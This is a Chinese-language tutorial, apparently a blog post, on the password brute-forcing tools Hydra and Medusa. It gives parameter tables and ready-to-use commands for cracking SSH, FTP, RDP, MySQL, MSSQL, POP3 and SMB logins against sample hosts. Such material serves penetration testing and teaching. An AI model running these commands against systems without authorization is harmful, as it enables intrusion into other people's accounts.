C/S爆破

Hydra

参数说明

参数说明
-R继续从上一次的进度开始破解
-S采用SSL链接
-s PORT如果非默认端口,可通过这个参数指定
-l LOGIN使用指定的用户名
-L FILE使用指定的用户名字典
-p PASS使用指定的密码破解
-P FILE使用指定的密码字典
-e nsn:空密码试探,s:使用指定账户和密码试探
-C FILE使用冒号分割格式 例如:”登录名:密码”代替-L/-P参数
-M FILE指定目标列表文件
-o FILE指定结果输出文件
-f破解成功后立刻中止破解,如果只破解一个账户,可以使用此选项
-t TASKS设置运行的线程数,默认为16
-w TIME设置最大超时时间,单位为秒,默认是30s
-v/-V显示详细过程
server目标IP
service指定要破解的服务,Hydra目前支持的服务和协议有:telnet、ftp、ssh、rdp(远程桌面)、pop3、imap、smb、smbnt、mssql、mysql、pcanywhere、teamspeak sip等

Hydra使用实例

  • 破解MySQL密码
    hydra.exe -L c:\user.txt -P c:\pass.txt 192.168.1.110 mysql

  • 破解FTP密码
    hydra.exe -l admin -P c:\pass.txt -t 5 192.168.1.110 ftp

  • 破解ssh
    hydra.exe -L users.txt -P password.txt -e n -t 5 -vV 192.168.1.110 ssh

  • 破解rdp
    hydra.exe -l administrator -P c:\pass.txt www.xxser.com rdp -V

  • 破解pop3
    hydra.exe -l root -P pass.txt my.pop3.mail pop3
    未指定文件路径时,Hydra将会在本目录下查找文件

Medusa

参数说明

参数说明
-h TEXT目标IP
-H FILE目标主机文件
-u LOGIN用户名
-U FILE用户名文件
-p PASS密码
-P FILE密码文件
-C FILE组合条目文件
-O FILE输出文件
-e [n/s/ns]N意为空密码,S意为密码与用户名相同
-M TEXT模块执行名称
-m TEXT传递参数到模块
-d显示所有的模块名称,非常实用
-n NUM使用非默认端口
-s启用SSL
-r NUM重试间隔时间,默认3秒
-t NUM设置线程数量
-L并行化,每个用户使用一个线程
-f在任何主机上找到第一个账号/密码后,停止破解
-q显示模块的使用信息,非常实用
-v NUM详细级别0~6
-w NUM错误调试级别0~10
-V显示版本
-Z TEXT继续扫描上一次

Medusa使用实例

  • 查看可以利用的模块
    medusa -d

  • 显示指定模块的帮助信息
    medusa -M 模块 -q

  • 破解smbnt
    medusa -h www.secbug.org -u administrator -P /pass.txt -e ns -M smbnt

  • 破解MSSQL
    medusa -h 192.168.1.110 -u sa -P /pass.txt -t 5 -f -M mssql

  • 使用“-C”参数破解smbnt
    medusa -M smbnt -C combo.txt
    combo.txt文件的格式如下:
    192.168.0.20:administrator:password
    192.168.0.20:testuser:pass
    192.168.0.30:administrator:blah
    192.168.0.40:user1:foopass
    ……
    ……

  • 破解SSH
    medusa -M ssh -H host.txt -U users.txt -p password

  • 日志信息
    medusa -h 192.168.1.11 -u sa -P /pass.txt -t 5 -f -e ns -M mssql -O /ap.txt

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值